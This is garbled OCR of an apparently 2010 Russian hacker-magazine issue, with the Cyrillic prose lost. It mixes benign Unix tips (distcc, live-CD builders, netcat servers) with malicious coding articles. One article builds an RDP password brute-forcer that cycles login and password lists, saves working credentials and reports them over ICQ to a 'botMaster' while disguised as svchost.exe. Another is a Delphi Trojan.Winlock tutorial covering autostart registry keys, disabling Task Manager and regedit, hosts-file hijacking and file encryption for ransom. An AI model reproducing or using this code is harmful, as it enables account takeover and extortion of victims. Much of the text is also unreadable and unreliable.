setenv PATH /usr/local/lib/distcc/bin:$PATH
:
DISTCC_HOST, distcc-:
setenv DISTCC_HOSTS "127.0.0.1 192.168.1.2
192.168.1.3 192.168.1.4"
, - .
distcc distccmon-text. ,
distcc. , distccmontext N, N
. Gnome ( )
distccmon-gnome.
distcc.
Gentoo ,
-. FreeBSD
, distcc,
distcc, CC CXX /etc/make.conf /usr/local/
lib/distcc/bin .

distcc ,
,
,
, . VPN,
,
SSH-.

Gentoo,
/.
distcc.
,
. ,
. -,
( /etc/distcc):
# mkdir -p /etc/distcc/.ssh
# usermod -d /etc/distcc distcc
-, :
# usermod -s /bin/bash distcc
-, :
# chown portage:portage /etc/distcc/.ssh/id_dsa

# chmod 600 /etc/distcc/.ssh/id_dsa
# chmod 644 /etc/distcc/.ssh/id_dsa.pub
emerge ssh
-,
:
# ssh-keyscan -t rsa 1 2 3 \
> /var/tmp/portage/.ssh/known_hosts
# chown portage:portage /var/tmp/portage/.ssh/ \
known_hosts
distcc:
# vi /etc/distcc/distcc-ssh
#!/bin/bash
exec /usr/bin/ssh -i /etc/distcc/.ssh/id_dsa "$@"
:
# chmod a+x /etc/distcc/distcc-ssh
/etc/make.conf:
# vi /etc/make.conf
MAKEOPTS="-j8"
FEATURES="distcc"
DISTCC_SSH="/etc/distcc/distcc-ssh"
DISTCC_HOSTS="localhost/2 distcc@1/3 distcc@
2/5"

, ccache distcc, ,
,
,
. ,
, ,
. ,
ccache gcc distcc-, ,
INSTALL. z
# passwd -u distcc
X 05 /136/ 10
087
UNIXOID
Adept adeptg@gmail.com

Linux
Linux. Distrowatch.com
649 ( ) ,
- . , ,
? ! ,
.
INSTALINUX

, .

.
? , LiveCD
( , ),
.

2 : . , ,
GUI
:).
:
netinstall-
.
SUSE STUDIO ;
RECONSTRUCTOR Debian Ubuntu;
088

:
UBUNTU CUSTOMIZATION KIT GUI-
Ubuntu;
RECONSTRUCTOR ;
REVISOR GUI-
Fedora;
LIVECD-CREATOR CLI-
Fedora.
SUSE STUDIO Novell,

.

(
LiveCD/LiveUSB) -

(
).
Suse Studio
(,
). OpenID Google, Yahoo Novell.

15 .

4 :
1. .
OpenSuse
11.2, SUSE Linux Enterprise 10 SUSE Linux
Enterprise 11 32-, 64-
. DE
Gnome, KDE IceWM,
.
2. ,
. ,
X 05 /136/ 10
WARNING
warning

.
,
!

.
RPM. OpenSuse 8000
, . ,
LiveCD, .
3. .
:
, , ,
runlevel, ( MySQL
PostgreSQL),
, ,
, .
.
4. , (LiveCD, HDD/
Flash ) .
.
, ,

( Testdrive).
KVM. -
2 /.

ssh vnc. , :).
Modified Files,
. , Suse Studio
, , , ,
.

4000 . (,
)
. , must use Suse!
UBUNTU:
Reconstructor, , Debian Ubuntu. -
$5,
.
,
(, $0,3), $5
. ,
PayPal.

(
Debian 5, Ubuntu 9.04 9.10 x86
x86-64), DE (Gnome, KDE, Xfce Text Only)
(LiveCD ).
, ( , X 05 /136/ 10
HTTP://WWW
Reconstructor.
). ,
,
.
,
, .
:
APT REPOSITORY UBUNTU PPA REPOSITORY
. ,

, Post Script;
INSTALL DEB PACKAGE deb;
SYSTEM UPGRADE ;
PRESEED Preseed-;
INSTALL FILE
;
: , , , Firefox ..
, , ( Build Project
). ,
(
)
. 10 .
, .
, Reconstructor
GPLv3,
.
, Reconstructor ,
, .
,
,
.

, www.
reconstructor.org/projects/reconstructor/files.
:
RECONSTRUCTOR ENGINE , -;
RECONSTRUCTOR ,
, -,
links
Suse Studio:
http://susestudio.com
Reconstructor:
https://reconstructor.
org
Instalinux:
www.instalinux.com
Ubuntu customization
Ubuntu
customization kit:
http://uck.
sourceforge.net
Revisor:
http://revisor.
fedoraunity.org
Calculate Linux
Scratch:
http://www.calculatelinux.org
Fedora.
! :)
http://spins.
fedoraproject.org
, , , ,
,

http://citkit.
ru/articles/1442/.
089
UNIXOID
SuseStudio
Revisor
. ,
, ,
.
-,

. ,
chroot- , .
chroot (,
,
). , -,

Bash,
.
:
Windows- (Firefox, Thunderbird
..)
.

,
, , Instalinux
. -,

! -,
: CentOS, Debian, Fedora,
OpenSUSE, Scientific, Ubuntu. , ,

-, LiveCD/, netinstall-,
. 6
. ,
(
,
).
, .
(
), ( ).

( Ubuntu)
.
ISO.
.
, Ubuntu Xfce
12 , Fedora 12 LXDE -
227 ( , , , ).
30 /,
. ISO,

Preseed, Kickstart AutoYaST. , Install
, .
, (
- ). Debian
preseed, Fedora (Red Hat, CentOS ..) kickstart, OpenSuse AutoYaST.
:
http://wiki.debian.org/DebianInstaller/Preseed
http://fedoraproject.org/wiki/Anaconda/Kickstart
http://en.opensuse.org/AutoYaST
090
, .
Instalinux
,
Preseed/Kickstart/AutoYaST .
, . ,
.
! , CentOS (
). ,

:
CentOS
.

*BUNTU!
Ubuntu customization kit . jaunty
.

.
5 .
:
,
LiveCD, ;
DE (: kde, gnome, others).

DE;
ISO Ubuntu (Kubuntu, Xubuntu,
etc);
CD;
?
!
;
Windows- CD?
chroot
Synaptic,
.
main restricted,
.
, Synaptic, SettingsRepositories,
universe multiverse .
(, LiveCD)
chroot.
: exit,

.
,
Continue building.
X 05 /136/ 10
SuseStudio TestDrive
Ubuntu customization kit

10.

, Fedora,
. GUI-
Revisor Livecd-creator CLI-. Revisor
UCK Reconstructor Fedora.
, ,
LiveCD,
.
Revisor Fedora,
,
:
# yum install revisor
Revisor, Livecd-creator
SELinux :
# setenforce 0
Revisor .
(CD/DVD
/ LiveCD).
. : /etc/revisor/revisor.conf
( ,
Fedora). ,
. , Revisor Fedora 12
Fedora 12 Fedora Rawhide
x86, x86-64 PPC. ,
Revisor , , Fedora 11
Fedora 13. kickstart-
, .
. :
,
(,
- ). , Revisor, , , (
2007).
( , ,
). , ,
, , SELinux, X Window
. Revisor
.

. Livecd-creator ,
.
LiveCD, ,
kickstart.
livecd-creator ( livecd-tools):
X 05 /136/ 10
# yum install livecd-tools spin-kickstarts

l10n-kickstarts
,
.
/usr/share/spin-kickstarts. LiveCD
:
# livecd-creator --config=/usr/share/
spin-kickstarts/fedora-livecd-desktop.ks
--fslabel=Fedora-LiveCD --cache=/var/cache/
live
INFO
info
PPA (Personal
Packages Archive)

Ubuntu, http://
launchpad.net Canonical.
USERFRIENDLY GENTOO
Gentoo,
.
Calculate Linux
Scratch (CLS). CLS Gentoo
,
LiveCD/LiveUSB. OpenBox,
Gnome (CLSG). CLS,
LiveCD Builder. Live-,
.
,
:
# cl-builder

chroot /mnt/builder,
. , , -
.
, ( exit
<Ctrl+D>) Live-.
, LiveCD:
# calculate --iso
/usr/calculate/share/linux.
, ,

- - rw-.
HAPPY END

:
. ,
, Linux from
Scratch... z
091
UNIXOID
zobni n@gmail.com
UNIX- , ,
.
,
. .
HTTP-

HTTP-, , .
, netcat 80-
PostScript, .

HTTP- bash 222
(http://alexey.sveshnikov.ru/blog/2006/12/23/
http----222-/).
UNIX- nc,
:
server$ nc -l -p 8080 < file
client$ x-www-browser
http://192.168.0.1:8080
HTTP-,
092

.
,
google chrome
,
:
$ while true; do nc -vv -l -p 8080 -c
'( read a b c; file=ècho $b | sed 's/
[â-zA-Z0-9.]//g'`; if [ a$file = "a"
]; then ls -l; else cat $file; fi )';
sleep 1; done
.
,
.

.
,
HTTP- (
MIME-),
404
index.html. , ,
.
HTTP- Martin A. Godisch.

- bash
awk, PostScript,
Adobe Systems

.
, ,
, http://
people.debian.org/~godisch/pshttpd
.

CUPS
CUPS,
UNIX-,
,

X 05 /136/ 10
cwget-
,
.
,
, CUPS

. CUPS
:
1. cwget.sh,

CUPS-:
$ sudo vi /usr/local/sbin/cwget.sh
#!/bin/sh
DOWNLOAD_DIR=$1
cd
mkdir -p "$DOWNLOAD_DIR"
cd "$DOWNLOAD_DIR"
/usr/bin/wget -nc -i "$2" >/dev/null 2>&1
:
$ sudo chmod +x /usr/local/sbin/cwget.sh
2. CUPS-,
URL
:
$ sudo vi /usr/lib/cups/backend/cwget
!/bin/sh
if [ $# -eq 0 ]; then
echo 'cups wget "Unknown" "Cups wget
downloader"'
exit 0
fi
#
DOWNLOAD_DIR=/var/tmp
umask 0
TMPFILE=/tmp/cwget$$
cat "$6" > $TMPFILE
/bin/chmod +r $TMPFILE
/usr/bin/sudo -H -u $2 /usr/local/sbin/cwget.
sh "$DOWNLOAD_DIR" "$TMPFILE"
rm /tmp/cwget$$
:
$ sudo chmod +x /usr/lib/cups/backend/cwget
3. sudo
X 05 /136/ 10
aucat(1)
cwget.sh ,
lp,
CUPS-, :
$ sudo visudo
lp
ALL=(ALL) NOPASSWD:/usr/local/sbin/
cwget.sh
4. web-,
cwget ( cwget-)
,
(
).
5. , (URL)
. , , :
$ echo 'http://kernel.org/pub/linux/kernel/
v2.6/linux-2.6.33.tar.bz2' | lpr -Ppcwget
HTTP://WWW
links
bash:
http://slashdot.org/
articles/01/02/
15/046242.shtml

mp3-:
www.xakep.
ru/magazine/
xa/062/110/1.asp
OPENBSD
Open' aucat, .au,

, ,

, ,
aucat.
OpenBSD-
, -
. , , :
1. aucat
. , aucat UNIX-,
(), ().
2. aucat
aucat,
ssh. ,
aucat UNIX-, aucat- ,
aucat- UNIX-
aucat-.
.
3. 2 , .
INFO
info
PostScript
.

.
093
UNIXOID
:
user1@host1> aucat -l
user1@host1> aucat -o user1@host2 aucat -i
user2@host2> aucat -l
user2@host2> aucat -o user2@host1 aucat -i
| ssh \
| ssh \
-

. ,
, aucat UNIX (
/tmp/aucat-ID-/default),
aucat
, ID
.
, aucat
.
aucat,
host2 ssh,
user1,

user2,
. ,
ID
,

/tmp/aucat-ID-
.
:
u1@h1> user1_UID='id -ur user1'
u1@h1> user2_UID=ìd -ur user2'
u1@h1> aucat -l; cd /tmp/
u1@h1> chmod 755 aucat-$user1_UID
u1@h1> ln -s aucat-$user1_UID aucat$user2_UID
u2@h2> user2_UID='id -ur user2'
u2@h2> user1_UID=ìd -ur user1'
u2@h2> aucat -l; cd /tmp/
u2@h2> chmod 755 aucat-$user2_UID
u2@h2> ln -s aucat-$user2_UID aucat$user1_UID

,

. Linux
,
VESA,
-.
Memory
Technology Device (MTD), ,
,
PCI. ,
. , , make
menuconfig, Device Drivers
:
$ sudo make menuconfig
Device Drivers --->
<M> Memory Technology Device (MTD)
support --->
<M> Direct char device access to
MTD devices
<M> Common interface to block
layer for MTD 'translation layers
<M> Caching block device access
to MTD devices
Self-contained MTD device
drivers --->
<M> Physical system RAM

PCI.
lspci :
$ lspci | grep VGA
:
. ,
,

11000 :
02:00.0 VGA compatible controller:

nVidia Corporation NV35 [GeForce FX
5900XT] (rev a1)
:
$ lspci -vvv -s 02:00.0
user1@host1> aucat -b 1 -r 11000 -o - \

| ssh user1@host2 aucat -b 1 \
-r 11000 -i -
094
,
prefetcheble.
SED
SED
, (
),
3D-. , ,
,
2D-
( ,
), 3D
. ,
,
, ,
.
1024x768@32 1024 * 768
* 4 = 3145728 (32 = 4 ) 3 .
, , ,
, ,
,
, ( ).

lspci prefetcheble- .
Memory at
e0000000.
8
X 05 /136/ 10
800000.
e0800000. phram,
( 128 , 8 120 ):
$ sudo modprobe phram phram=VRAM,0xe0800000,120Mi
MTD:
prefetchable- lspci
$ cat /proc/mtd
,
. , mtdblock, /dev/mtd0
/dev/mtdblock0:
$ sudo modprobe mtdblock
, :
$ sudo mkswap /dev/mtdblock0
$ sudo swapon /dev/mtdblock0
:
$ sudo mkfs.ext2 /dev/mtdblock0
, /etc/X11/xorg.conf
Device Driver "vesa".
,

SED (Stream EDitor), UNIX
,
,
,
. ,
UNIX- ,
, SED
- (http://uuner.livejournal.com/55238.html). ,
, , ,
.
, , (http://sed.sourceforge.net) 11 ,
, . ,
Apache, SED- web-.
JABBER SSH
SSH-
. ,
22- ,
NAT. , , jabber-,
jabber-,
.
, , ,
. ,
www.ylsoftware.com. ,
.
, :
$ wget ylsoftware.com/jabber-shell-20090303.tar.bz2
X 05 /136/ 10
$ tar -xjf jabber-shell-20090303.tar.bz2

$ vi ~/.jabber-shell
(
#
'server' => 'jabber.ru',
'port'
=> '5222',
# ,
'username' => 'jabber-shell',
'password' => 'password',
#
'resource' => 'jabber-shell',
# JID
'admins' => 'admin1@host.com admin2@host.ru',
)
JID' (
) , admins.
perl, libnet-xmppperl libnet-jabber-perl :
$ ./jabber-shell.pl &
WEB-
www.youtube.com/watch?v=LG
HItQK2fA8&feature=player_embedded, ,
python-, ,
web-. ,
.
cmake, python, python-xlib,

OpenCV (http://opencv.sf.net). , :
$
$
$
$
tar -xjf OpenCV-2.0.0.tar.bz2

cd OpenCV-2.0.0
mkdir release; cd release
cmake -D CMAKE_BUILD_TYPE=RELEASE \
-D CMAKE_INSTALL_PREFIX=/usr/local \
-D BUILD_PYTHON_SUPPORT=ON ..
$ sudo make install
cam-mouse-ctrl.py,
, .
?
, .
, ,
( :).z
095
CODING
RankoR, rankor777@gmail.com, ax-soft.ru

-

RDP-
,
. tss-brute metal ActiveX-based ,
Dizz .
- tss-brute (RDP Brute by Dizz) R&D P Brute.
Windows. , !

, , - ,
.
metala ( ).
, mstsc.
exe.
ActiveX-based ActiveX
.
, ,
, n ,
n .
(
, !). ,
Windows
Server 2003, .
096
, , ,
Windows NT,

RDP 5!
2009 . RDP, , ,
. , ,
rdesktop RDP- , X-
.
. - ,
. ,
.
, ,
X 05 /136/ 10
>> coding
HTTP://WWW
links
forum.asechka.ru

ICQ
ax-soft.ru

qt.nokia.com Qt
WARNING
warning
Qt Creator
, rdesktop . , , ,
- ! , , ,
.
. pudn.
com winRDesktop rdesktopa Windows,
MS Visual Studio. ,
, .
,
. ,
:
1. winrdesktop,
, IP .
.
2. GUI -, :
, IP, ICQ-. GUI
C++ Qt.
,
,
ICQ Delphi/BCB?
Qt- QOSCAR ICQ
(, , ),
qoscar.googlecode.com.
, , ( ) .
, , !
DEVELOPERS, DEVELOPERS, DEVELOPERS!

WinRDesktopa. ,
, ,
"PUDN". , Rdesktop
. - Rdesktop! . Visual Studio 2008
( VC++ 2008 Express, Professional
, X 05 /136/ 10
, ,
DreamsPark,
. VC 9,
VS2008
.

rdesktop.h,
. ,
Win 2k, , ,
. , Win 2000
.
? ,
/ . ,
#define LOGON_AUTH_FAILED\xfe\x00\x00 ,
.
.
.
, ? :)
process_text2()
orders.c. - . , ,
PDU_LOGON.
:
process_text2()
if (!memcmp(os->text, LOGON_AUTH_FAILED, 3))
ExitProcess(2);

.
,
,

.
DVD
dvd

INFO
info

RDP Qt
,

RDesktop Qt
if((!memcmp(os->text, LOGON_MESSAGE_FAILED_
XP, 18)) || (!memcmp(os->text,LOGON_MESSAGE_
FAILED_2K3, 18)))
ExitProcess(3);
.
.
097
CODING
winRDesktop Visual Studio 2008
rocess_text2() , ( ),

logone. rdp.c process_
data_pdu(). , case
RDP_DATA_PDU_LOGON:. ExitProcess(4) .
ExitProcess() .
, winRdesktopa .
, .
.
, . ,
ShowWindow SW_HIDE.
,
? Printf()
, .

ExitCode.
, ExitProcess(4) ,
ExitProcess(2) , ExitProcess(3)
. ( process_text2() ).
, . , , 30
100% MSI Wind u90. (RDP- ). (
)
( , ?),
,
. ,
, :).
, , - , .
, , ,
:).
, , ,
metala. , , ,
, ,
-.
, C#,
( , ) Qt
Framework. ][ ,
. ,
.
Qt qt.nokia.com
( Qt Software,
098
,
).
Qt Creator ( snapshot
, stable-, ,
). , GUI-
. ,
. .
.
1. .
2. .exe-,
, .
3. , , ,
, 2.
BruteThread, ,
, , QThread,
,
. BruteThread winRDesktopa
process QProcess. QProcess
, ,
(, printf cout, ), .

, void started() void finished(int
exitCode) .
,
.
,
onFinished().
, ;.
:

QStringList slArgs;
slArgs << "-u" << slLogins.at(iCurrentLogin)
<< "-p" << slPasswords.at(iCurrentPassword)
<< sServer;
process.start(svchost.exe, slArgs);
iCurrentPassword++;
, QStringList,
:).
, ,
:
QObject::connect(&process, SIGNAL(finished(int)),
this, SLOT(onFinished(int)));
, :
metal aka DeX C/C++,
, !
.fry OSCAR,
forum.asechka.ru .
:
xo0x.art, vitalikis,
Sundagy /C++,
Miracle :),
, , :).
X 05 /136/ 10
>> coding
onFinished()
if ( exitCode > 666 )
{
emit onServerResult(sServer,
slLogins.at(iCurrentLogin),
slPasswords.at(iCurrentPassword-1),
exitCode);
emit onDoneServer(this);
return;
onServerResult() Qt Creator
, :
}
switch ( exitCode )
{
case 666: //
return;

if ( iResult == 0 )
{
iGood++;
iChecked++;
case 0: //
true);
writeResult(QString("%1:%2;%3").arg(sServer
).arg(sUser).arg(sPassword), "good.txt");
if ( bSkipZero )
{
return;
}
break;
oscar.sendMessage(settings.botMaster(),
QString("%1:%2;%3").arg(sServer).arg(sUser)
.arg(sPassword));
if ( trayIcon.isVisible() )
trayIcon.showMessage("Good",
QString("%1:%2;%3").arg(sServer).arg(
sUser).arg(sPassword));
}
else
if ( iResult == -1 )
{
iBad++;
iChecked++;
}
case 4: // !
0);
return;
case 5: //
0);
DONE!
! ,
. ,
,
, , , -,
. , , ,
, :).

R&D P Brute, , (
!), (
mstscax.dll, ??, ShowMessage()???).
, , , brain.dll hands.lib
( sslBot , ). ,
.
,
:
1) .
2) ( , ).
. !z
X 05 /136/ 10
return;
default: //
-1);
break;
}
nextPassword();
099
T OJAN.WINLO
TR
OCK
K
var
CODING
Spider_NET
disk:DWORD;
begin
case Msg.WPara m of
DBT _ DEVICEARRIVAL:
if (PDEV _ BROADCAST //
.dbch _ devicetype _ HDR(Msg.LParam)^
= DBT _ DEVTYP _ VOLUME
) then

TROJAN.WINLOCK
,
,
, , .
?
, 10% . ,
,
:
, Windows.
?
( ,

). ,
. .
:
1. . ,
.
web- , ,
, . , (
).

?.
: -
100
. ,
. security-, (
) .
, .
2. FLASH. Adobe .
flash-,
. ,
, .
,
, .

. ,

.
3. .
,
X 05 /136/ 10
>> coding
WINDOWS API
wc.cbSize:=sizeof(wc);
wc.style:=cs_hredraw or cs_vredraw;
wc.lpfnWndProc:=@WindowProc;
wc.cbClsExtra:=0;
wc.cbWndExtra:=0;
wc.hInstance:=HInstance;
wc.hIcon:=LoadIcon(0,idi_application);
wc.hCursor:=LoadCursor(0,idc_arrow);
wc.hbrBackground:=COLOR_BTNFACE+1;
wc.lpszMenuName:=nil;
wc.lpszClassName:=win_main;
RegisterClassEx(wc);
leftPos:=20;
topPos:=0;
windowWidth:=Screen.Width;
WindowHeight:=Screen.Height;
MainWnd:=CreateWindowEx(
0,
win_main,
test,
ws_overlappedwindow,
leftPos,
topPos,
windowWidth,
windowHeight,
0,
0,
Hinstance,
nil
);
msdn
WINAPI
var
Key: HKey;
begin
//
.
RegOpenKey(HKEY_LOCAL_MACHINE,
PChar(), Key);
SetWindowLong(MainWnd, GWL_HWNDPARENT,
GetDesktopWindow);
RegSetValueEx(Key,PChar(paramstr(0)),
0, REG_SZ,
pchar(paramstr(0)),
lstrlen(pchar(paramstr(0)))+1);
SetWindowPos(MainWnd, HWND_TOPMOST,
0, 0, 0, 0, SWP_NOMOVE or SWP_NOSIZE);
RegCloseKey(Key);
end;
ShowWindow(MainWnd, CmdShow);
While GetMessage(Mesg,0,0,0) do
begin
TranslateMessage(Mesg);
DispatchMessage(Mesg);
end;
.
,
Winlocker, flash- .
, , , .
, ,
Delphi. exe
!, . , .
API. ,
X 05 /136/ 10
WARNING
warning

-
.

,

.

.
100 .
- .
WINLOCKER
Winlockera ,
. ,
,
. ,
, . ,
-,
. , ,
.

,
.

WM_SYSCOMMAND. ,
101
RD;
begin
case Msg.WPara m of
.dbch _ devicetype _ HDR(
= DBT _
CODING

(. ) WM_SYSCOMMAND. ,

.
.
. : . ,
,
. , :
1. HKLM\Software\Microsoft\Windows\CurrentVersion\Run
, .
2. HKCU\Software\Microsoft\Windows\Current\Version\Run ,
, ,
.
3. HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
, .
4. HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\
Run ,
.
5. HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows
, ,
Windows.
6. KHLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
, .
7. . , ,
, .

102
? ,
- .
, . WinAPI
.

var
disk:DWORD;
begin
case Msg.WParam of
DBT_DEVICEARRIVAL: //
if (PDEV_BROADCAST_HDR(Msg.LParam)^
.dbch_devicetype = DBT_DEVTYP_VOLUME) then
begin
//
disk := PDEV_BROADAST_VOLUME(Msg.LParam" ")^
.dbcv_unitmask;
//
end;
DBT_DEVICEREMOVECOMPLETE: //
if (PDEV_BROADCAST_HDR(Msg.LParam)^
.dbch_devicetype = DBT_DEVTYP_VOLUME) then
begin
//
end;
X 05 /136/ 10
//
_ HDR(Msg.LParam)^
DBT _ DEVTYP _ VOLUME
) then
>> coding
WEB-
var
_buff: array [0..1024] of char;
_request:string;
_temp: string;
_path: string;
_FileStream : TFileStream;
begin
Recv(_client, _buff, 1024, 0);
_request:=string(_buff);
_path := GetFilePath (Copy
(_request, 1, pos(#13, _request)));
_path := ReplaceSlash(_path);
if ((_path = '') or (_path = '\')) Then
_path := DocumentRoot + '\' + DirectoryIndex;
{ else
if ((_path[length(_path)] ='\')) Then
_path := DocumentRoot + '\' +
DirectoryIndex; }
if (FileExists(_Path)) Then
begin
_FileStream :=
TFileStream.Create(_Path, fmOpenRead);
SendStr(_Client, 'HTTP/1.0 200 OK');
SendStr(_Client, 'Server: xSrV');
SendStr(_Client, 'Content-Length:' +
IntToStr(_FileStream.Size));
SendStr(_Client, 'Content-Type: '
+ GetTypeContent(_Path));
SendStr(_Client, 'Connection: close');
SendStr(_Client, '');
SendFile(_Client, _FileStream);
_FileStream.Free;
End
//
, !
.
, .
. . Windows (, Pro
) gpedit.
.
, ,
X 05 /136/ 10
. , , .
, ,
. ? :
, ProcessMonitor
. ,
.

Windows regedit.
,
.
.
. , DisableRegistryTools 1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System.
, ,
. , .
DisableTaskMgr ( dword) 1
, DisableRegistryTools.
. ,
NoAddRemovePrograms 1 ( dword) , DisableRegistryTools.
,

.
!
NoViewOnDrive (dword) HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer.
. , C 4. ,
,
. , 12 C (4) D (8).
103
CODING
begin
case Msg.WPara m of
.dbch _ devicetype _ HDR(Msg.LParam)^
= DBT _ DEVTYP _ VOLUME
) then
1:

. ,
, . : HKEY_CURRENT_
USER\Microsoft\Windows\CurrentVersion\Policies\Explorer\
RistrictRun. ( REG_SZ)
,
RestrictRun dword
1.
,
.
,

.
NoManageMyComputerVerb dword 1
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer.
, (, ).

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services.
start.
,
, start 3. ,
, .

.
Winlocker ,
, .
, ,
. ,
,
.
: , ,
skype .. -
, .
, , .
104
? ! , ,
.
, ,
. ?
. ,
. . ,
WM_DEVICECHANGE. 3.
,
, Delphi.
.
MSDN, ,
DVD.
2: !
web- ?
, :
, , , facebook, twitter, etc.
. ?
, ,
. , . ,
,
. , ,

.
. ,
. , ,
.
, ? ,
.

. .
hosts.

:ip.
web-.
?.
evil-,
. , .
,
web.
localhost.
: 127.0.0.1 www.odnoclassniki.ru
hosts ,
, Delphi WEB-.
, Winsock API. (FTP, PROXY,
IRC ..) api-.

( . .). ? !
, ., ,
evil-. , web-
(
, ). :
, web-
X 05 /136/ 10
>> coding
then
Key: TWordTriple): boolean;

//
function MemoryDecrypt(Src: Pointer;
SrcSize: Cardinal; Target: Pointer;
TargetSize: Cardinal; Key: TWordTriple): boolean;
,
.
4: !
ProcessMonitor
. ,
,
. ,
, .
3:
-
SMS? -. ,
. ?
, / , :
(doc, xls, mdb, ppt, txt), (jpeg, png, bmp),
(php, pas, c, h, cpp, dpr, py ..).
- ,
,
.
.
FindFirs() FindNext()
Sysutils. , .
,
: FindFirstFile() FindNextFile().
(.
), .
Delphi
. . ,
torry.net . ,
Delphi. :
//
function FileEncrypt(InFile, OutFile: String;
//
function FileDecrypt(InFile, OutFile: String;
//
function TextEncrypt(const s: string;
Key: TWordTriple): string;
//
function TextDecrypt(const s: string;
Key: TWordTriple): string;
// ""
function MemoryEncrypt(Src: Pointer; SrcSize:
Cardinal;
Target: Pointer; TargetSize: Cardinal;
X 05 /136/ 10

.
. ( ), , winlocker -. :
. ,
. .

. , .
joiner . , (. #104)
.
5:
, Winlocker
.
, ,
. :
system.exe, user32.exe, csrss.exe, eplorer.exe .
, , ,
.
,
:
1. .
, .
2. . , API .
API. !
3. .
6:

.
,
. ,
, ,
.
WORK COMPLETE
WinLocker
. -

, .
Winlockera. ,
.
? ! ,

, . ,
. , . , ,
. ,
,
:). z
105
CODING
presidentua , http://tutamc.com
INPRIVATE

IE8
, Microsoft. , ,

. , ,
,
, , .
SMARTSCREEN

SmartScreen Internet Exlorer, -
SAFE BROWSING GOOGLE

. http://safebrowsing.clients.google.com/
Chrome FireFox md5 url. md5 , , , md5
. , . API.
, .
http://code.google.com.
106
. SmartScreen
urs.
microsoft.com :
POST /urs.asmx?MSPRU-Client-Key=l7m7EvM2K/
IVNQCBF7AVPg%3d%3d&MSPRU-Patented-Lock=XdXWSI8WgDg%3d
HTTP/1.1
Host: urs.microsoft.com
<soap:Envelope ...><soap:Body><Lookup xmlns="http://
Microsoft.STS.STSWeb/"><r soapenc:arrayType="xsd
:string[1]"><string>http://tutamc.com</string></
r><ID>{B3BB5BBA-E7D5-40AB-A041-A5B1C0B26C8F}</
ID><v soapenc:arrayType="xsd:string[5]"><strin
g>7.0.6004.6</string><string>7.00.5824.16386</
string><string>7.0.6000.16386</
string><string>6.0.6000.0.0</string><string>enX 05 /136/ 10
>> coding
SmartScreen
IE
us</string></v></Lookup></soap:Body></
soap:Envelope>
IE URL , , , ,
, IP-. . -
, -,
. - , -
IP- . ,

, ,
: ,
, . , SmartScreen, ,
.
:), ,
X 05 /136/ 10
. , ,
.
URL
Opera. ! ,

. ,
Chrome FireFox.
IE 8 -
(InPrivate Browsing), .
,
.
, -. -,
, IE
. , - SmartScreen
,
.
, .
IE
. urs.
microsoft.com. ,
. , . -? (
, ) .
! InPrivat !

, . . .
,
, ,
.
, ? , . , -
DVD
dvd

-
IE

,

HTTP://WWW
links

Safe Browsing
Google
http://code.
google.com/apis/
safebrowsing
Python

http://pywinauto.
openqa.org
107
CODING
FireFox ,
, ,

FireFox

IE
def do_CONNECT(self):
open('d:\\test.txt', 'w+').close()
#
, IE , , - test.txt. ,
, :
,

,
.

URL. , IE,
:
C:\Documents and Settings\admin\Local Settings\Temporary Internet
Files\AntiPhishing\2CEDBFBC-DBA8-43AA-B1FD-CC8E6316E3E2.dat
( XP).
, IE
.
, , ,
, . .
, ?
Socks-,
-,
, urs.microsoft.com, .
, , , ,
, ,
!
, , , PYTHON!
- , .
TinyHTTPProxy, , ,
Pythone. do_CONNECT,
HTTPS-. IE ,
urs.microsoft.com.

, -,
.
, , .
108
urls = (
'http://not_porn1.com/',
'http://super_puper_porn1.com/',
)
for url in urls:
time.sleep(1)
try:
os.remove('d:\\test.txt')
except: pass
test_url(url)
if not os.path.exists('d:\\test.txt'):
print "U were on this site: %s"%url
test_url, IE
URL. , ,
, Python IE ,
IE (
), IE.
pywinauto (http://pywinauto.
openqa.org), WinAPI. IE:
prog_ie = r"C:\Program Files\Internet Explorer\
iexplore.exe"
application.Application.start("%s %s"%(prog_ie,url.
decode(utf-8)))
WinAPI,
:
import win32gui
import win32con
def window_enumeration_handler_ie(hwnd, resultList):
if string.find(win32gui.GetWindowText(hwnd), \
"Internet Explorer") != -1:
resultList.append(hwnd)
else:
None
def close_program_ie():
ie_windows = []
win32gui.EnumWindows(window_enumeration_handler_ie,
X 05 /136/ 10
>> coding
IE
Google Safe Browsing

prog_ie = r"C:\Program Files\Internet Explorer\
iexplore.exe"
application.Application.start("%s %s" %
(prog_ie,url.decode('utf-8')))
time.sleep(5)
close_program_ie()
time.sleep(2)
ILDASM
ie_windows)
for i in ie_windows:
win32gui.SendMessage(i,win32con.WM_CLOSE,0,0)
window_enumeration_handler_ie title, IE, .

close_program_ie,
WinAPI EnumWindows
IE. WM_CLOSE,
.
, test_url:
import win32gui
import win32con
from pywinauto import application
def test_url(url):
X 05 /136/ 10
-
. , -
.
IE,
. , , .
, IE Reset IE, -
, . ,
: , IE . :).
,
IE - .
, :
,
, ;
,
( !) .
, IE , .
InPrivate Browsing -,
(- ,
.),
-. z
109
CODING
deeonis deeonis@gmail.com
C++
++ -
,
.
,

.
, C++
.
, ,
.
. -
: , , .

, ,
,
C++.

. ,
D (derived, ),
B (base, ). ,
,
D B,
. , B D, D
, B. ,
,
B,
D, D B.
, D,
B , D
B, .
.

110
. ,
,
.
-
class Person {...};
class Student: public Person {...};
void
//
void
//
eat (const Person &p);

study (const Student &s);

Person p;
Student s;
eat(p);
// , p
eat(s);
// , s ,
//
study(s);
//
study(p);
// ! p
.
,
,
,
- ,
.

, .
:
. . C++
:

class Bird {
public:
virtual void fly();
//
};
//
class Penguin: public Bird {
};
.
, ,
.
.
, .
.

class Bird {
public:
// - fly
X 05 /136/ 10
};
class FlyingBird: public Bird {
public:
virtual void fly();
};
// - fly
};

, , , .
, . fly() ,
.

void error(const std::string& msg);
virtual void fly()
{ error( !); }
};
, : ,
.
.
, ,
.
:

. :

//
int x;
void someFunc()
{
//
double x;
std::cin >> x;
}
, x , ,
.
x someFunc, , - . , .
x double.
.
.

class Base {
private:
int x;
public:
virtual void mf1() = 0;
virtual void mf1(int);

class Bird {
public:
virtual void mf2();

void mf3();
void mf3(double);
// - fly
};
};
// - fly
};
class Derived: public Base {

public:
virtual void mf1()
void mf3();
void mf4();
};
